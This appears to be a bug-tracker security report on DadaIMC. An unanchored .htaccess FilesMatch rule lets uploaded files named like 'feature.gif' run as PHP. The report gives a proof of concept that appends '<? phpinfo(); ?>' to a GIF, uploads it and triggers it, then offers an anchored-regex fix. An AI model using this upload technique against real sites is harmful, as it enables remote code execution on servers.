The instructions for installing Dada into a shared environment lists the<br>following .htaccess file:<br><br>(<a href="http://www.dadaimc.org/mod/documentation/display/4/index.php">http://www.dadaimc.org/mod/documentation/display/4/index.php
</a>)<br><br>&lt;FilesMatch &quot;(feature|editor|newswire|otherpress|admin|pbook|media|mod)&quot;&gt;<br>&nbsp;ForceType application/x-httpd-php<br>&lt;/FilesMatch&gt;<br><br>The problem is that the regular expression in FilesMatch allows any
<br>uploaded files with the words<br>feature|editor|newswire|otherpress|admin|pbook|media|mod in the name to be<br>executed as php code provided they can be passed through the mime filter.<br><br>Example:<br><br>~$ wget -O 
<a href="http://www.google.com/intl/en_ALL/images/logo.gif">http://www.google.com/intl/en_ALL/images/logo.gif</a> [^]<br>:~$ wget -O feature.gif <a href="http://www.google.com/intl/en_ALL/images/logo.gif">http://www.google.com/intl/en_ALL/images/logo.gif
</a><br>--14:14:11-- <a href="http://www.google.com/intl/en_ALL/images/logo.gif">http://www.google.com/intl/en_ALL/images/logo.gif</a> [^]<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =&gt; `feature.gif'<br>Resolving www.google.com... <a href="http://216.239.37.99">
216.239.37.99</a>, <a href="http://216.239.37.104">216.239.37.104</a><br>Connecting to www.google.com|216.239.37.99|:80... connected.<br>HTTP request sent, awaiting response... 200 OK<br>Length: 8,558 (8.4K) [image/gif]<br>
100%[===============================================================================================================&gt;]<br>8,558 --.--K/s<br><br>14:14:11 (200.27 KB/s) - `feature.gif' saved [8558/8558]<br><br>:~$ echo &quot;&lt;? phpinfo(); ?&gt;&quot; &gt;&gt; 
feature.gif<br><br>create a new article and upload feature.gif as a media file.<br><br>Right click on the google logo after submitting the article, click copy<br>image location, paste into new window. Scroll down to see phpinfo()
<br>output.<br><br><br>To Fix, upgrade to software where the author has a clue about security.&nbsp; <br><br>Until you can manage that, a temporary fix would be to change the .htaccess file to read:<br><br>&lt;FilesMatch &quot;(feature$|editor$|newswire$|otherpress$|admin$|pbook$|media$|mod$)&quot;&gt;
<br><br>or use the location directive in httpd.conf instead.<br><br><a href="http://bugs.dadaimc.org/view.php?id=191">http://bugs.dadaimc.org/view.php?id=191</a><br><br><br><br><br><br>